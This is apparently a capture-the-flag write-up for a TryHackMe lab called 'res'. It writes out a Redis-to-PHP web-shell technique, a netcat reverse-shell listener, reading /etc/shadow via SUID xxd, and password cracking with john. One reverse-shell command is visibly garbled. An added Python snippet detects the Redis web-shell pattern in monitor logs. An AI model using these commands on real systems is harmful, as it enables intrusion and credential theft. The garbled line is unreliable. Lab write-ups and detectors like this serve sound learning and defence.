These notes are from a challenge I did @tryhackme called res.

Flag 1

Scanning the environment we find an Apache web server and a Redis database...

sudo nmap -sC -sV -sS -p-

When connecting to Redis we can write a file to the main Apache directory and create a simple PHP reverse shell:

redis-cli -h
>config set dir /var/www/html
>config set dbfilename shell.php
>set test "<?php system($_GET['cmd']);?>"

Before we visit our new page we should open a netcat session:

nc -nvlp 666

Time to run our shell.php :) 667 -e /bin/sh

Once we are successfully connected we can stabilize the shell and view the first flag:

python3 -c 'import pty;pty.spawn("/bin/bash")'
cat /home/vianka/user.txt
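
Seen from the defender's side, the Redis step above leaves a recognizable trail: the dump directory is moved into a web root, the dump file gets a name that does not end in .rdb, and a stored value contains a PHP tag. The following is an added example, not part of the original notes; it scans constructed `redis-cli monitor` output for those three signs, and the web root list and sample client addresses are assumptions.

```python
import re
import shlex

# Constructed sample in the line format printed by `redis-cli monitor`;
# client addresses use documentation ranges and are not from the write-up.
SAMPLE_MONITOR = r'''
1700000000.100001 [0 203.0.113.7:51122] "config" "set" "dir" "/var/www/html"
1700000000.200002 [0 203.0.113.7:51122] "config" "set" "dbfilename" "shell.php"
1700000000.300003 [0 203.0.113.7:51122] "set" "test" "<?php system($_GET['cmd']);?>"
1700000001.000000 [0 127.0.0.1:40000] "config" "set" "dbfilename" "dump.rdb"
1700000002.000000 [0 127.0.0.1:40000] "get" "session:42"
'''

WEB_ROOTS = ("/var/www", "/usr/share/nginx", "/srv/www")  # assumed web roots
LINE_RE = re.compile(r'^\d+\.\d+ \[\d+ (\S+)\] (.+)$')
SCRIPT_RE = re.compile(r'<\?(php|=)', re.I)

def classify(args):
    """Return the rule names one parsed Redis command triggers."""
    low = [a.lower() for a in args]
    rules = []
    if low[:2] == ["config", "set"]:
        # Redis 7 accepts several key/value pairs in one CONFIG SET.
        for key, value in zip(low[2::2], args[3::2]):
            if key == "dir" and value.startswith(WEB_ROOTS):
                rules.append("dump-dir-in-web-root")
            if key == "dbfilename" and not value.lower().endswith(".rdb"):
                rules.append("dump-file-not-rdb")
    elif low[:1] == ["set"] and len(args) >= 3 and SCRIPT_RE.search(args[2]):
        rules.append("script-tag-in-value")
    return rules

def scan(text):
    """Return (client, rule) pairs for every suspicious command in the log."""
    findings = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue
        try:
            args = shlex.split(m.group(2))
        except ValueError:
            continue  # unbalanced quoting: skip the line instead of crashing
        findings.extend((m.group(1), rule) for rule in classify(args))
    return findings

if __name__ == "__main__":
    for client, rule in scan(SAMPLE_MONITOR):
        print(client, rule)
```

All three rules firing for the same client within a short window is a much stronger signal than any single one, since a legitimate `config set dbfilename` on its own is routine.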

Flag 2

Let's have a look at the passwd file:

cat /etc/passwd

The SUID bit is set for xxd. To access the shadow file we can use this trick:

xxd "$LFILE" | xxd -r

Time to crack the password:

unshadow passwd.txt shadow.txt > hash.txt
john hash.txt

Once we have the password we can escalate our privileges to vianka, which somehow also has root access.

su vianka
sudo su
cat /root/root.txt